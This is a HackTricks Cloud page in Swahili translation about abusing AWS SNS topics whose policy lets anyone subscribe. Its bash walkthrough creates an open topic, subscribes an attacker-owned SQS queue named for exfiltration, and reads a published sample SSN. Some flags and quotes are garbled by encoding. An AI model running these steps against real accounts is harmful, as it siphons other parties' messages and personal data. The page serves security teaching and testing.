HackTricks CloudAWS - SNS Unauthenticated Enum
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na đŹ Discord group au the telegram group au utufuate kwenye Twitter đŚ @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.
SNS
Kwa maelezo zaidi kuhusu SNS angalia:
Wazi kwa Wote
Unapoweka topic ya SNS kupitia web console inawezekana kuonyesha kwamba Kila mtu anaweza kuchapisha na kujiandikisha kwenye topic:
.png)
Kwa hivyo ikiwa utakapopata ARN ya topics ndani ya account (au kwa brute forcing majina yanayowezekana ya topics) unaweza kuangalia kama unaweza kuchapisha au kujiandikisha kwao.
Hii itakuwa sawa na sera ya rasilimali ya SNS topic kuruhusu sns:Subscribe kwa * (au kwa accounts za nje), yoyote principal anaweza kutengeneza subscription itakayowasilisha ujumbe wote wa topic ujao kwa SQS queue wanayomiliki. Wakati mmiliki wa queue anapoanzisha subscription, hakuna uthibitisho wa binadamu unaohitajika kwa SQS endpoints.
Mfano (us-east-1)
```bash REGION=us-east-1 # Victim account (topic owner) VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)Open the topic to anyone subscribing
cat > /tmp/topic-policy.json <<JSON {âVersionâ:â2012-10-17â,âStatementâ:[{âSidâ:âOpenSubscribeâ,âEffectâ:âAllowâ,âPrincipalâ:â*â,âActionâ:âsns:Subscribeâ,âResourceâ:â$VICTIM_TOPIC_ARNâ}]} JSON aws sns set-topic-attributes âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âattribute-name Policy âattribute-value file:///tmp/topic-policy.json
Attacker account (queue owner)
ATTACKER_Q_URL=$(aws sqs create-queue âqueue-name attacker-exfil-queue-$(date +%s) âregion $REGION âquery QueueUrl âoutput text) ATTACKER_Q_ARN=$(aws sqs get-queue-attributes âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âattribute-names QueueArn âquery Attributes.QueueArn âoutput text)
Allow the victim topic to send to the attacker queue
cat > /tmp/sqs-policy.json <<JSON {âVersionâ:â2012-10-17â,âStatementâ:[{âSidâ:âAllowVictimTopicSendâ,âEffectâ:âAllowâ,âPrincipalâ:{âServiceâ:âsns.amazonaws.comâ},âActionâ:âsqs:SendMessageâ,âResourceâ:â$ATTACKER_Q_ARNâ,âConditionâ:{âArnEqualsâ:{âaws:SourceArnâ:â$VICTIM_TOPIC_ARNâ}}}]} JSON aws sqs set-queue-attributes âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âattributes Policy=â$(cat /tmp/sqs-policy.json)â
Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)
SUB_ARN=$(aws sns subscribe âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âprotocol sqs ânotification-endpoint â$ATTACKER_Q_ARNâ âquery SubscriptionArn âoutput text)
Validation: publish and receive
aws sns publish âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âmessage {pii:ssn:123-45-6789} aws sqs receive-message âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âmax-number-of-messages 1 âwait-time-seconds 10 âquery Messages[0].Body âoutput text
</details>
> [!TIP]
> Jifunze na ufanye mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na ufanye mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na ufanye mazoezi ya Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Saidia HackTricks</summary>
>
> - Angalia the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** đŹ [**Discord group**](https://discord.gg/hRep4RUj7f) au the [**telegram group**](https://t.me/peass) au **utufuate** kwenye **Twitter** đŚ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki hacking tricks kwa kutuma PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>